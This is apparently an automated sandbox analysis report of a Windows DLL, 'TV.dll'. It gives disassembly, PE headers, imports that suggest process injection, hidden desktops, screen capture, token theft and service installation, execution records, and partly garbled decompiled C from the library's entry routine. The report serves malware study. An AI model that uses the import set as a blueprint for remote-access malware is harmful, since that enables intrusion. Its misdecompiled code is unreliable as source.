mov ecx, dword ptr [ebp+08h]
mov eax, 00005A4Dh
cmp word ptr [ecx], ax
je 00007F4020DB6D86h
xor eax, eax
pop ebp
ret
mov eax, dword ptr [ecx+3Ch]
add eax, ecx
cmp dword ptr [eax], 00004550h
jne 00007F4020DB6D71h
xor edx, edx
mov ecx, 0000010Bh
cmp word ptr [eax+18h], cx
sete dl
mov eax, edx
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
push ebx
push esi
movzx esi, word ptr [ecx+06h]
xor edx, edx
push edi
lea eax, dword ptr [eax+ecx+18h]
test esi, esi
jbe 00007F4020DB6D9Dh
mov edi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [eax+0Ch]
cmp edi, ecx
jc 00007F4020DB6D8Bh
mov ebx, dword ptr [eax+08h]
add ebx, ecx
cmp edi, ebx
jc 00007F4020DB6D8Ch
inc edx
add eax, 28h
cmp edx, esi
jc 00007F4020DB6D6Ah
xor eax, eax
pop edi
pop esi
pop ebx
pop ebp
ret
push 00000008h
push 1000E1A8h
call 00007F4020DB6DF1h
and dword ptr [ebp-04h], 00000000h
mov esi, 10000000h
push esi
call 00007F4020DB6CE6h
pop ecx
test eax, eax
je 00007F4020DB6DBFh
mov eax, dword ptr [ebp+08h]
sub eax, esi

Rich Headers

Programming Language:
  • [ASM] VS2008 SP1 build 30729
  • [ C ] VS2008 SP1 build 30729
  • [LNK] VS2010 SP1 build 40219
  • [EXP] VS2010 SP1 build 40219
  • [RES] VS2010 SP1 build 40219
  • [ C ] VS2010 SP1 build 40219
  • [C++] VS2008 SP1 build 30729
  • [C++] VS2010 SP1 build 40219
  • [IMP] VS2008 SP1 build 30729

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0xfb20 | 0x56 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe1c4 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x11000 | 0x54c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x10000 | 0x25f8 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x12000 | 0xe24 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xd490 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0x474 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xb3a8 | 0xb400 | False | 0.566710069444 | data | 6.2885659067 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0xd000 | 0x2b76 | 0x2c00 | False | 0.492542613636 | data | 5.83402513298 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x10000 | 0x978 | 0x400 | False | 0.439453125 | data | 3.70380830115 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x11000 | 0x54c | 0x600 | False | 0.314453125 | data | 5.27415157917 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x12000 | 0x1094 | 0x1200 | False | 0.675347222222 | data | 5.98331885024 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_MANIFEST | 0x11088 | 0x15a | ASCII text, with CRLF line terminators | English | United States
RT_MANIFEST | 0x111e4 | 0x365 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States

Imports

DLL | Import
MSVCRT.dll | _except_handler4_common, _amsg_exit, _initterm, free, malloc, _XcptFilter
NTDLL.dll | NtSetContextThread, NtFreeVirtualMemory, RtlComputeCrc32, RtlDecompressBuffer, NtTerminateThread, RtlRandom, NtAllocateVirtualMemory, RtlMoveMemory, NtSuspendThread, NtOpenThread, RtlGetVersion, NtQuerySystemInformation, NtQueryVirtualMemory, RtlCompareMemory, NtWriteVirtualMemory, NtFlushInstructionCache, RtlGetNtVersionNumbers, NtOpenProcess, RtlTimeToSecondsSince1970, NtGetContextThread, RtlZeroMemory, NtResumeThread, NtTerminateProcess, NtCreateSection, NtMapViewOfSection, NtUnmapViewOfSection, NtClose, NtProtectVirtualMemory
KERNEL32.dll | LocalFree, GetModuleHandleA, lstrlenA, VirtualFree, VirtualAlloc, GetFileSize, ExitProcess, GetFileAttributesA, Sleep, CreateThread, CreateEventA, OpenEventA, lstrcmpiA, GetCommandLineA, lstrcmpA, FindClose, FindNextFileA, DeleteFileA, lstrcatA, FindFirstFileA, lstrlenW, MoveFileExA, HeapReAlloc, WideCharToMultiByte, MultiByteToWideChar, CreatePipe, GetLastError, SetCurrentDirectoryA, GetExitCodeProcess, WaitForSingleObject, WritePrivateProfileStringA, GetPrivateProfileIntA, lstrcmpiW, FreeResource, LockResource, SizeofResource, LoadResource, FindResourceW, SetEvent, WaitForMultipleObjects, ExpandEnvironmentStringsA, FreeLibrary, GetSystemTimeAsFileTime, GetPrivateProfileStringW, GetLocaleInfoW, SetLastError, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameA, GetComputerNameExW, WTSGetActiveConsoleSessionId, GetSystemDirectoryA, DisableThreadLibraryCalls, WritePrivateProfileStringW, FormatMessageW, LoadLibraryExA, GetVolumeInformationW, LocalAlloc, InterlockedCompareExchange, InterlockedExchange, HeapCreate, HeapDestroy, QueryPerformanceCounter, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, LoadLibraryA, GetProcAddress, GetTickCount, lstrcpyA, CreateFileW, GetFileAttributesW, MoveFileExW, SetFilePointer, CloseHandle, WriteFile, ReadFile, HeapFree, GetProcessHeap, HeapAlloc, CreateFileA, CreateProcessA, GetPrivateProfileStringA
USER32.dll | MessageBoxW, GetWindowLongA, SetWindowLongA, SetWindowPos, BringWindowToTop, SetForegroundWindow, SendMessageA, GetThreadDesktop, CreateDesktopA, CloseDesktop, SwitchDesktop, SetThreadDesktop, LoadStringW, GetClassNameW, DestroyWindow, CreateDialogIndirectParamW, SetWindowTextA, GetWindowLongW, SetWindowLongW, PostQuitMessage, CallWindowProcW, CharLowerW, SetTimer, GetMessageA, KillTimer, GetForegroundWindow, GetWindowTextW, GetWindowThreadProcessId, GetDlgItemTextA, DispatchMessageA, GetDesktopWindow, GetDC, GetWindowRect, GetCursorInfo, GetIconInfo, DrawIconEx, ReleaseDC, CharLowerA, GetDlgItem, PostThreadMessageA, IsWindow, PostMessageA, wsprintfA, wsprintfW, ExitWindowsEx
SHLWAPI.dll | StrChrW, PathGetDriveNumberA, PathBuildRootW, StrToIntA, PathFindFileNameW, StrCmpNIW, StrCmpNIA, StrTrimA, PathIsRelativeA, PathIsRelativeW, PathQuoteSpacesW, StrRChrA, StrDupA, StrChrA, PathRemoveFileSpecA, PathAddBackslashA, PathFindFileNameA, PathRemoveFileSpecW, PathAddBackslashW
WTSAPI32.dll | WTSEnumerateSessionsA, WTSQuerySessionInformationA, WTSFreeMemory, WTSQueryUserToken
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock
ADVAPI32.dll | RegDeleteKeyA, RegDeleteValueA, RegEnumKeyExA, RegQueryInfoKeyA, RegOpenKeyExA, LogonUserW, AdjustTokenPrivileges, LookupPrivilegeValueW, GetUserNameW, RegisterServiceCtrlHandlerExW, QueryServiceStatusEx, RegQueryValueExA, RegCloseKey, SetNamedSecurityInfoA, SetSecurityInfo, SetEntriesInAclA, CreateWellKnownSid, GetNamedSecurityInfoA, GetSecurityInfo, FreeSid, CheckTokenMembership, AllocateAndInitializeSid, DuplicateToken, GetTokenInformation, OpenProcessToken, ConvertSidToStringSidA, EqualSid, DuplicateTokenEx, CreateProcessAsUserW, CloseServiceHandle, DeleteService, ControlService, QueryServiceStatus, OpenServiceA, OpenSCManagerA, StartServiceA, ChangeServiceConfigA, QueryServiceConfigA, SetServiceStatus, RegCreateKeyExA, ChangeServiceConfig2A, CreateServiceA, RegSetValueExA
WININET.dll | InternetSetOptionA, InternetConnectA, HttpOpenRequestA, HttpAddRequestHeadersA, HttpSendRequestExA, InternetOpenA, InternetCloseHandle, HttpQueryInfoA, InternetReadFile, InternetWriteFile, InternetOpenUrlA, HttpEndRequestA
SHELL32.dll | SHCreateDirectoryExW, SHGetSpecialFolderPathA, ShellExecuteExA, SHFileOperationA, SHCreateDirectoryExA
PSAPI.DLL | GetModuleFileNameExW
GDI32.dll | CreateCompatibleDC, BitBlt, DeleteDC, DeleteObject, CreateCompatibleBitmap, SelectObject, GetObjectA
Cabinet.dll |
OLEAUT32.dll | VariantInit, SysAllocString, SysAllocStringLen, SysFreeString
ole32.dll | CoSetProxyBlanket, CoCreateInstance, CoInitializeEx, CoUninitialize, CoTaskMemFree

Exports

Name | Ordinal | Address
SvcEntry | 400 | 0x10003b60

Possible Origin

Language of compilation system | Country where language is spoken | Map
English | United States |

Network Behavior

No network behavior found

Code Manipulations

System Behavior

General

Start time:13:48:28
Start date:15/09/2021
Path:C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):true
Commandline:loaddll32.exe 'C:\Users\user\Desktop\TV.dll'
Imagebase:0x1020000
File size:116736 bytes
MD5 hash:542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:13:48:28
Start date:15/09/2021
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\TV.dll',#1
Imagebase:0x870000
File size:232960 bytes
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:13:48:29
Start date:15/09/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\TV.dll,SvcEntry
Imagebase:0xf30000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:13:48:29
Start date:15/09/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe 'C:\Users\user\Desktop\TV.dll',#1
Imagebase:0xf30000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:13:48:32
Start date:15/09/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe 'C:\Users\user\Desktop\TV.dll',SvcEntry
Imagebase:0xf30000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Disassembly

Code Analysis

    Executed Functions

    C-Code - Quality: 92%
    			E6ECA8510(struct HINSTANCE__* _a4, intOrPtr _a8) {
    				char _v268;
    				char _v276;
    				char _v284;
    				char _v292;
    				char _v524;
    				char _v532;
    				char _v540;
    				char _v548;
    				char _v556;
    				char _v568;
    				char _v572;
    				char _v576;
    				char _v580;
    				char _v584;
    				char _v588;
    				char _v592;
    				char _v596;
    				char* _v600;
    				intOrPtr _v604;
    				intOrPtr _v608;
    				int _v612;
    				char* _v616;
    				intOrPtr _v620;
    				intOrPtr _v624;
    				int _v628;
    				char* _v632;
    				intOrPtr _v636;
    				intOrPtr _v640;
    				int _v644;
    				char* _v648;
    				intOrPtr _v652;
    				intOrPtr _v656;
    				int _v660;
    				char* _v664;
    				intOrPtr _v668;
    				intOrPtr _v672;
    				int _v676;
    				char* _v680;
    				intOrPtr _v684;
    				intOrPtr _v688;
    				int _v692;
    				char* _v696;
    				intOrPtr _v700;
    				intOrPtr _v704;
    				int _v708;
    				char* _v712;
    				intOrPtr _v716;
    				intOrPtr _v720;
    				int _v724;
    				char* _v728;
    				intOrPtr _v732;
    				intOrPtr _v736;
    				int _v740;
    				char* _v744;
    				intOrPtr _v748;
    				intOrPtr _v752;
    				int _v756;
    				char* _v760;
    				char _v764;
    				intOrPtr _v768;
    				int _v772;
    				char* _v776;
    				intOrPtr _v780;
    				intOrPtr _v784;
    				int _v788;
    				char* _v792;
    				intOrPtr _v796;
    				intOrPtr _v800;
    				int _v804;
    				char* _v808;
    				intOrPtr _v812;
    				intOrPtr _v816;
    				int _v820;
    				char* _v824;
    				intOrPtr _v828;
    				intOrPtr _v832;
    				void* _v836;
    				char* _v840;
    				long _v844;
    				intOrPtr _v848;
    				int _v852;
    				long _v856;
    				intOrPtr _v860;
    				void _v864;
    				char _v868;
    				long _v876;
    				intOrPtr _v892;
    				int _v912;
    				char* _v916;
    				int _v920;
    				char* _v924;
    				int _v928;
    				void* _v932;
    				int _v936;
    				char _v937;
    				char _v938;
    				short _v939;
    				void* _v940;
    				int _v944;
    				char _v945;
    				short _v947;
    				void* _v948;
    				void* _v952;
    				void* _v956;
    				char* _v960;
    				char _v964;
    				char _v968;
    				short _v970;
    				char _v972;
    				short _v974;
    				char _v976;
    				short _v978;
    				char _v980;
    				short _v982;
    				char _v984;
    				char _v988;
    				char _v992;
    				signed int _v996;
    				signed int _v1008;
    				intOrPtr _t262;
    				void* _t263;
    				void* _t264;
    				void* _t265;
    				void* _t266;
    				void* _t267;
    				void* _t268;
    				void* _t269;
    				void* _t270;
    				void* _t271;
    				void* _t272;
    				void* _t273;
    				void* _t274;
    				void* _t275;
    				struct HINSTANCE__* _t277;
    				struct HINSTANCE__* _t278;
    				struct HINSTANCE__* _t279;
    				struct HINSTANCE__* _t280;
    				struct HINSTANCE__* _t281;
    				struct HINSTANCE__* _t282;
    				struct HINSTANCE__* _t283;
    				void* _t284;
    				void* _t285;
    				void* _t286;
    				void* _t287;
    				void* _t288;
    				void* _t289;
    				void* _t290;
    				CHAR* _t343;
    				CHAR* _t347;
    				void* _t350;
    				void* _t351;
    				void* _t357;
    				CHAR* _t359;
    				long _t360;
    				char* _t362;
    				void* _t363;
    				intOrPtr _t365;
    				char _t366;
    				WCHAR* _t369;
    				void* _t371;
    				CHAR* _t373;
    				intOrPtr _t375;
    				CHAR* _t390;
    				CHAR* _t400;
    				void* _t403;
    				signed int _t404;
    				int _t407;
    				struct HINSTANCE__* _t410;
    				intOrPtr _t413;
    				void* _t415;
    				struct HINSTANCE__* _t419;
    				void* _t423;
    				struct HINSTANCE__* _t425;
    				void* _t426;
    				struct HINSTANCE__* _t428;
    				void* _t429;
    				char _t430;
    				int _t431;
    				void* _t432;
    				char _t433;
    				int _t434;
    				void* _t436;
    				int _t440;
    				void* _t441;
    				int _t443;
    				intOrPtr _t444;
    				intOrPtr _t456;
    				char* _t457;
    				char* _t459;
    				char _t461;
    				intOrPtr* _t467;
    				char* _t468;
    				int _t469;
    				void* _t471;
    				void* _t472;
    				int _t474;
    				short* _t475;
    				long _t480;
    				long _t484;
    				char* _t493;
    				int _t494;
    				WCHAR* _t498;
    				void* _t500;
    				CHAR* _t502;
    				char _t503;
    				char _t505;
    				char _t506;
    				void* _t532;
    				char* _t537;
    				void* _t540;
    				CHAR* _t543;
    				CHAR* _t544;
    				char _t551;
    				CHAR* _t552;
    				intOrPtr _t559;
    				intOrPtr _t566;
    				void* _t567;
    				void* _t580;
    				signed int _t582;
    				void* _t583;
    				signed int _t587;
    				void** _t589;
    				intOrPtr* _t592;
    				void* _t596;
    				struct HINSTANCE__* _t597;
    				void* _t602;
    				void* _t604;
    				void* _t609;
    				void* _t612;
    				void* _t613;
    				void* _t614;
    				void* _t615;
    				void* _t616;
    				void* _t617;
    				void* _t618;
    				void* _t619;
    				void* _t623;
    				void* _t624;
    
    				_t262 = _a8;
    				if(_t262 == 0) {
    					_t263 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xcd1a50
    					__eflags = _t263;
    					if(_t263 != 0) {
    						HeapFree(GetProcessHeap(), 0, _t263);
    					}
    					_t264 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD";
    					__eflags = _t264;
    					if(_t264 != 0) {
    						HeapFree(GetProcessHeap(), 0, _t264);
    					}
    					_t265 = M6ECB0520; // 0xcbff88
    					__eflags = _t265;
    					if(_t265 != 0) {
    						HeapFree(GetProcessHeap(), 0, _t265);
    					}
    					_t266 = M6ECB0524; // 0xcd1c70
    					__eflags = _t266;
    					if(_t266 != 0) {
    						HeapFree(GetProcessHeap(), 0, _t266);
    					}
    					_t267 = M6ECB0528; // 0xcc27f0
    					__eflags = _t267;
    					if(_t267 != 0) {
    						HeapFree(GetProcessHeap(), 0, _t267);
    					}
    					_t268 = M6ECB0530; // 0xcb2c98
    					__eflags = _t268;
    					if(_t268 != 0) {
    						HeapFree(GetProcessHeap(), 0, _t268);
    					}
    					_t269 = M6ECB0534; // 0xcc2700
    					__eflags = _t269;
    					if(_t269 != 0) {
    						HeapFree(GetProcessHeap(), 0, _t269);
    					}
    					_t270 = M6ECB04F8; // 0xcd21b8
    					__eflags = _t270;
    					if(_t270 != 0) {
    						HeapFree(GetProcessHeap(), 0, _t270);
    					}
    					_t271 = M6ECB0504; // 0xcd3fb0
    					__eflags = _t271;
    					if(_t271 != 0) {
    						HeapFree(GetProcessHeap(), 0, _t271);
    					}
    					_t272 = M6ECB04F4; // 0xcbe878
    					__eflags = _t272;
    					if(_t272 != 0) {
    						HeapFree(GetProcessHeap(), 0, _t272);
    					}
    					_t273 = M6ECB0500; // 0xcc63c8
    					__eflags = _t273;
    					if(_t273 != 0) {
    						HeapFree(GetProcessHeap(), 0, _t273);
    					}
    					_t274 = M6ECB04CC; // 0xcb2da8
    					__eflags = _t274;
    					if(_t274 != 0) {
    						HeapFree(GetProcessHeap(), 0, _t274);
    					}
    					_t275 = M6ECB04D0; // 0xcc4128
    					__eflags = _t275;
    					if(_t275 != 0) {
    						HeapFree(GetProcessHeap(), 0, _t275);
    					}
    					__eflags = "\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
    					if(__eflags != 0) {
    						_t277 = M6ECB04A8; // 0x0
    						__eflags = _t277;
    						if(_t277 != 0) {
    							FreeLibrary(_t277);
    						}
    						_t278 = M6ECB0490; // 0x0
    						__eflags = _t278;
    						if(_t278 != 0) {
    							FreeLibrary(_t278);
    						}
    						_t279 = M6ECB0494; // 0x0
    						__eflags = _t279;
    						if(_t279 != 0) {
    							FreeLibrary(_t279);
    						}
    						_t280 = M6ECB0498; // 0x0
    						__eflags = _t280;
    						if(_t280 != 0) {
    							FreeLibrary(_t280);
    						}
    						_t281 = M6ECB049C; // 0x0
    						__eflags = _t281;
    						if(_t281 != 0) {
    							FreeLibrary(_t281);
    						}
    						_t282 = M6ECB04A0; // 0x0
    						__eflags = _t282;
    						if(_t282 != 0) {
    							FreeLibrary(_t282);
    						}
    						_t283 = M6ECB04A4; // 0x0
    						__eflags = _t283;
    						if(_t283 != 0) {
    							FreeLibrary(_t283);
    						}
    						_t284 =  *0x6ecb047c; // 0x0
    						__eflags = _t284;
    						if(_t284 != 0) {
    							HeapFree(GetProcessHeap(), 0, _t284);
    						}
    						_t285 = M6ECB04D4; // 0x0
    						__eflags = _t285;
    						if(_t285 != 0) {
    							HeapFree(GetProcessHeap(), 0, _t285);
    						}
    						_t286 = M6ECB04DC; // 0x0
    						__eflags = _t286;
    						if(_t286 != 0) {
    							HeapFree(GetProcessHeap(), 0, _t286);
    						}
    						_t287 = M6ECB04D8; // 0x0
    						__eflags = _t287;
    						if(_t287 != 0) {
    							HeapFree(GetProcessHeap(), 0, _t287);
    						}
    						_t288 = M6ECB04F0; // 0x0
    						__eflags = _t288;
    						if(_t288 != 0) {
    							LocalFree(_t288);
    						}
    						__eflags = M6ECB0614 - 2;
    						if(M6ECB0614 == 2) {
    							E6ECAB840(0);
    						}
    						__eflags = M6ECB0614; // 0x0
    						if(__eflags > 0) {
    							E6ECAB510();
    						}
    						_t589 = 0x6ecb046c;
    						do {
    							_t289 =  *_t589;
    							__eflags = _t289;
    							if(_t289 != 0) {
    								CloseHandle(_t289);
    							}
    							_t589 =  &(_t589[1]);
    							__eflags = _t589 - 0x6ecb0478;
    						} while (_t589 < 0x6ecb0478);
    						_t290 = M6ECB0510; // 0x0
    						__eflags = _t290;
    						if(_t290 != 0) {
    							NtTerminateThread(_t290, 0);
    							_t532 = M6ECB0510; // 0x0
    							CloseHandle(_t532);
    						}
    					}
    					goto L131;
    				} else {
    					if(_t262 != 1) {
    						L131:
    						return 1;
    					} else {
    						DisableThreadLibraryCalls(_a4);
    						"<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = GetModuleHandleA(0);
    						_v928 = 0;
    						_t343 = HeapAlloc(GetProcessHeap(), 8, 0x105);
    						"on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t343;
    						if(GetSystemDirectoryA(_t343, 0x105) == 0) {
    							ExitProcess(0);
    						}
    						_t493 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xcd1a50
    						PathAddBackslashA(_t493); // executed
    						_t347 = HeapAlloc(GetProcessHeap(), 8, 0x105);
